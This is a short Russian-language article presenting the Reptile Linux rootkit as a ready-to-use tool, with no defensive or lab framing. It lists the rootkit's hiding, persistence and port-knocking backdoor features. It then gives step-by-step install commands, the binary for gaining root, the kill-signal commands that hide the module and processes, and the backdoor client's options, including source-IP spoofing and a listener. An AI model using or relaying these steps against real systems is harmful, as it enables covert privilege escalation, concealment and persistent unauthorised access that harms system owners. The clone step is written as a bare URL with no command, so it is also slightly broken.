Приветствую! В этой статье, речь пойдет о rootkit для Linux систем, под именем Reptile.



Rootkit — набор программных средств, обеспечивающих:

· маскировку объектов (процессов, файлов, директорий, драйверов);

· управление (событиями, происходящими в системе);

· сбор данных (параметров системы).

Особенности Reptile:

· Root-права не привилегированным пользователям

· Сокрытие файлов и каталогов

· Сокрытие содержимого файлов

· Сокрытие процессов

· Собственная маскировка

· Сохранение загрузок

· ICMP / UDP port-knocking backdoor.

Установка:

> apt-get install linux-headers-$(uname -r)



> https://github.com/f0rb1dd3n/Reptile.git

> cd Reptile

> ./installer.sh install



Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.

Получение rootправ:


> /reptile/r00t

> Id



Использовалась следующая ОС:



Скрытность Рептилии:

· Скрыть / показать модуль: kill -50 0

· Скрыть / показать процесс: kill -49

· Скрыть содержимое файлов: весь контент между тегами будет скрыт.



> #

> content to hide

> #

Port Knocking к хосту с Рептилией:

> ./knock_on_heaven

Аргументы:

· -x protocol (ICMP/UDP)

· -s Source IP address (You can spoof)

· -t Target IP address

· -p Source Port

· -q Target Port

· -d Data to knock on backdoor: " "

· -l Launch listener

Конец, спасибо за внимание.

P.S. Дополнительная информация:

>https://github.com/f0rb1dd3n/Reptile

Спасибо, за внимание.